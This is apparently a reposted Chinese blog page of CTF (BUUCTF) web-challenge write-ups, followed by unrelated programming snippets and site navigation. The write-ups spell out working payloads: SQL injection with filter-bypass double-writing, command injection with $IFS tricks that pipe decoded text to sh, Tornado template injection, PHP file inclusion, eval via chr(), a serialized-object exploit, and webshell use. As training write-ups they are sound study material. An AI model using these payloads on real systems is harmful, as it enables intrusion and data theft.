flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
JSON
...ecode错误处理机制,使开发者能够更准确地捕获并解决JSON解析问题。同时,PHP官方文档也提供了更多关于如何安全、高效地处理JSON数据的最佳实践指南。 此外,随着RESTful API设计规范的推广,JSON Schema作为一种用于描述JSON数据结构的标准格式,正在逐步成为主流。它允许开发者为JSON数据定义严格的模式约束,从而确保在数据传输过程中满足预设规则,减少因数据格式错误导致的问题。 因此,对于PHP开发者而言,除了掌握基础的JSON编码解码操作之外,了解并紧跟相关领域的最新动态和技术发展,如PHP 8.1对JSON处理的改进以及JSON Schema的应用,无疑将有助于提升开发效率和代码质量,更好地适应现代Web开发的需求。
2023-01-18 13:53:09
461
算法侠
Java
...器管理的父类Bean实例转换为具体的子类实例。Spring框架通过AOP代理和类型检查机制,提供了一种更为智能和安全的转换方式。同时,Java 8及更高版本引入了Optional类以增强类型安全,开发者可以通过Optional提供的map方法进行安全的向下转型,从而避免ClassCastException异常。 深入探究,类型转换还涉及Java运行时的类型信息获取、泛型擦除等复杂问题。在处理集合类如List中存储Cat对象并进行向下转型时,可以借助Java反射API或TypeReference类解决泛型类型擦除带来的不便。 此外,《Effective Java》一书中的Item 53:优先使用继承而非类型参数化来实现“is-a”关系,强调了正确理解并使用类型转换对于设计稳定、易于维护的代码库至关重要。这也提醒我们在实际编程中,不仅要掌握类型转换的技巧,更要遵循面向对象设计原则,合理利用继承与多态特性,确保代码的可读性和扩展性。 总的来说,理解并熟练运用Java中的类型转换不仅是实现功能的基础,也是优化性能、提高代码质量的关键所在。随着技术的发展,诸如Project Valhalla等新特性的引入将进一步丰富Java类型系统,使得类型转换在未来的Java编程中有更多可能性和挑战等待我们去探索。
2023-12-31 10:17:23
337
编程狂人
Java
...作已知类型来使用。在实例化泛型类或调用泛型方法时,类型参数会被实际的类类型所替换。 静态类型检查 , 静态类型检查是编程语言的一种特性,它在编译阶段就能对代码进行类型一致性验证。在Java泛型中,通过引入类型参数,编译器能在编译时确保传递给泛型方法或存储在泛型类中的对象与指定的类型参数匹配,如果类型不匹配,编译器将报错,从而提高了程序的健壮性和安全性。 类型安全 , 类型安全是指编程语言能够在编译期间或者运行期间确保变量、表达式以及方法调用具有正确的数据类型,并且不会发生非法类型转换导致的错误。在Java泛型中,通过类型擦除和类型参数机制,使得程序员在编写代码时必须明确指定类型,这有助于避免因为类型混淆引发的潜在问题,增强了程序的稳定性和可靠性。例如,通过泛型,集合类如ArrayList<T>只能存储T类型的元素,从而确保了集合内数据的一致性,提高了类型安全性。
2023-01-06 19:10:18
357
码农
c++
...一起,并支持通过继承机制复用和扩展已有类的功能。 构造函数(Constructor) , 在C++中,构造函数是一种特殊类型的成员函数,与类同名,用于初始化新创建的对象。当实例化一个类时,构造函数自动执行,用于设置对象的初始状态或执行必要的初始化操作。如文章中的Rectangle(double l, double w)就是一个构造函数,它接受两个参数用于初始化矩形的长和宽。 封装(Encapsulation) , 是面向对象编程的三大特性之一,指的是隐藏对象的内部实现细节,仅对外提供公共接口进行交互。在C++中,通过访问修饰符public、private和protected可以控制类成员的访问权限。例如,将数据成员设为private后,外部代码无法直接访问这些变量,只能通过类提供的公共成员函数间接操作,从而保证了数据的安全性和完整性,降低了模块间的耦合度。
2023-01-30 11:25:06
846
灵动之光
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
dig @dns_server domain_name MX
- 查询指定DNS服务器上某域名的邮件交换记录(MX记录)。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"